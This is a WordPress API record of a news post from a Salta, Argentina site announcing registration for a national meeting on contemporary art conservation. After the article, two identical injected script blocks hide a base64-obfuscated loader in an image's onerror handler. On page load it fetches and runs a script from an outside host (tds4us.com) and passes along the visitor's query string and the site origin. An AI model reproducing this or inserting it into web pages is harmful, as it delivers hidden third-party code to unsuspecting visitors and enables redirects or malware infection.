{"id":2989,"date":"2023-08-13T18:34:39","date_gmt":"2023-08-13T21:34:39","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2989"},"modified":"2025-08-14T00:10:30","modified_gmt":"2025-08-14T03:10:30","slug":"inscripcion-abierta-para-el-encuentro-nacional-sobre-registro-documentacion-y-conservacion-de-arte-contemporaneo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2989","title":{"rendered":"Inscripci\u00f3n abierta para el Encuentro Nacional sobre Registro, Documentaci\u00f3n y Conservaci\u00f3n de Arte Contempor\u00e1neo"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background\" style=\"background-color:#910327\"><em>Destinado a investigadores, profesionales, personal de museos, estudiantes de carreras de arte y afines que quieran participar de este encuentro que tendr\u00e1 lugar en Salta en octubre.<\/em><\/h4>\n\n\n\n<p>Los d\u00edas 4 y 5 de octubre, en la ciudad de Salta, tendr\u00e1 lugar el Encuentro Nacional sobre Registro, Documentaci\u00f3n y Conservaci\u00f3n de Arte Contempor\u00e1neo, donde se expondr\u00e1n y analizar\u00e1n diferentes aspectos relativos a la gesti\u00f3n integral de colecciones de arte contempor\u00e1neo, dando continuidad a las actividades realizadas desde 2017.<\/p>\n\n\n\n<p>La inscripci\u00f3n permanecer\u00e1 abierta hasta el 31 de agosto a las 23.55 h. Para participar se debe completar el siguiente &nbsp;Formulario. La confirmaci\u00f3n de vacantes se informar\u00e1 por correo electr\u00f3nico antes del 5 de septiembre.<\/p>\n\n\n\n<p>La actividad est\u00e1 destinada a investigadores, profesionales, personal de museos, estudiantes de carreras de arte y afines, a cargo de colecciones de arte contempor\u00e1neo.<\/p>\n\n\n\n<p>El encuentro se realizar\u00e1 en la Usina Cultural de la ciudad de Salta, provincia de Salta, y est\u00e1 organizado por la Direcci\u00f3n Nacional de Bienes y Sitios Culturales, con el apoyo y la colaboraci\u00f3n del Centro Cultural de Espa\u00f1a en Buenos Aires \u2013 AECID de la Embajada de Espa\u00f1a en Argentina, del Programa ACERCA-AECID del Ministerio de Asuntos Exteriores de Espa\u00f1a, de la Secretar\u00eda de Cultura de la Provincia de Salta y del Museo Nacional de Bellas Artes.<\/p>\n\n\n\n<p>La actividad tendr\u00e1 un cupo de 120 participantes.<\/p>\n\n\n\n<p>Para consultas y m\u00e1s informaci\u00f3n escribir a\u00a0<a href=\"https:\/\/www.salta.gob.ar\/enacargentina@gmail.com\" target=\"_blank\" rel=\"noopener\" title=\"\">enacargentina@gmail.com<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><em><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/inscripcion-abierta-para-el-encuentro-nacional-sobre-registro-documentacion-y-conservacion-de-arte-contemporaneo-91194\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/em><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Destinado a investigadores, profesionales, personal de museos, estudiantes de carreras de arte y afines que quieran participar de este encuentro que tendr\u00e1 lugar en Salta en octubre. Los d\u00edas 4 y 5 de octubre, en la ciudad de Salta, tendr\u00e1 lugar el Encuentro Nacional sobre Registro, Documentaci\u00f3n y Conservaci\u00f3n de Arte Contempor\u00e1neo, donde se expondr\u00e1n [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2990,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26],"tags":[],"class_list":{"0":"post-2989","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2989"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2989"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2989\/revisions"}],"predecessor-version":[{"id":6993,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2989\/revisions\/6993"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2990"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2989"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2989"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2989"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}